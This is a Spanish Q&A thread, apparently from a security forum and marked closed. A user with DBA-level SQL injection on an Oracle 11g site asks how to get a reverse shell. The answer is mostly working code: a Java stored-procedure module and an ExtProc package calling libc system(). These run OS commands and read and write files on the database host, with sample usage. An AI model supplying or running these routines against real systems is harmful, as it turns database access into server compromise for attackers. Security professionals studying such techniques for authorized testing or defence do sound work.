Shell Invertido de Inyección de Oracle Sql [cerrado]

1

Estoy probando la inyección SQL en un sitio web que usa código ASP. Puedo conseguir con éxito todas las bases de datos y tablas. El usuario actual tiene privilegios de DBA. Me pregunto cómo puedo obtener una shell inversa utilizando esta inyección SQL. La versión de Oracle es "Oracle Database 11g Enterprise Edition Release 11.1.0.7.0"

    
pregunta user1968957 02.08.2015 - 17:50
fuente

1 respuesta

3

Puede probar estas dos formas de ejecutar código en Oracle DBMS.

El primero es con el código Java: enlace

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
    /*
     * Command execution module
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java           
name 'oraexec.execCommand(java.lang.String)';
/

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
/

El segundo es usar ExtProc: enlace

-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell32
    language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell64
    language c;
end oracmd64;
/
    
respondido por el Cristian Dobre 02.08.2015 - 19:27
fuente

Lea otras preguntas en las etiquetas